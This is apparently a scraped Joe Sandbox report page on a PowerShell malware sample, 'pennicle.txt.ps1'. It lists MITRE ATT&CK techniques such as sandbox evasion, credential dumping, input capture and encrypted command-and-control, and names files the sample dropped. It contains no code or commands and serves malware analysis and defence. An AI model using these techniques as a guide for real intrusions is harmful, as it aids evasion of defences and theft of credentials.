Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pennicle.txt.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\701961\Puts.com

C:\Users\user\AppData\Local\Temp\701961\j

C:\Users\user\AppData\Local\Temp\Battle

C:\Users\user\AppData\Local\Temp\Battle.cmd

C:\Users\user\AppData\Local\Temp\Closely

C:\Users\user\AppData\Local\Temp\Inventory

C:\Users\user\AppData\Local\Temp\Kingdom

C:\Users\user\AppData\Local\Temp\Playing

C:\Users\user\AppData\Local\Temp\Reducing

C:\Users\user\AppData\Local\Temp\Relationship

C:\Users\user\AppData\Local\Temp\Solution

C:\Users\user\AppData\Local\Temp\Suppose

C:\Users\user\AppData\Local\Temp\Tits

Windows Analysis Report
pennicle.txt.ps1

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre